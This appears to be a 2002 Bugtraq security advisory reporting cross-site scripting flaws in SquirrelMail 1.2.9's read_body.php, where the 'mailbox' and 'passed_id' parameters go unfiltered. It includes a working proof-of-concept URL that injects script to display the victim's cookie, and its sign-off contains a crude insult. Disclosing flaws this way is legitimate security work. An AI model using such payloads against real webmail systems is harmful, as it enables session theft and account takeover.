85919 2002-12-03 20:12 /46 rader/ euronymous <just-a-user@yandex.ru> Importerad: 2002-12-03 20:12 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Extern mottagare: vulnwatch@vulnwatch.org Externa svar till: just-a-user@yandex.ru Mottagare: Bugtraq (import) <2629> Ärende: SquirrelMail v1.2.9 XSS bugs ------------------------------------------------------------ =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: SquirrelMail v1.2.9 XSS bugs product: SquirrelMail v1.2.9 vendor: www.squirrelmail.org risk: low date: 12/3/2k2 discovered by: euronymous /F0KP /HACKRU Team advisory url: http://f0kp.iplus.ru/bz/008.txt =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description ----------- when reading some email you can to insert the scripting code.. read_body.php dont make filtering users input in `mailbox' and `passed_id' variables. btw, today has released v1.2.10. im dont know if this version contains this xss. sample attack ------------- http://hostname/src/read_body.php?mailbox= %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id= %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E& startMessage=1&show_more=0 [it must be in a single string] not URL-encoded string working fine also. shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all russian security guyz!! fuck_off: slavomira and other dirty ppl in *.kz ================ im not a lame, not yet a hacker ================ (85919) /euronymous <just-a-user@yandex.ru>/--------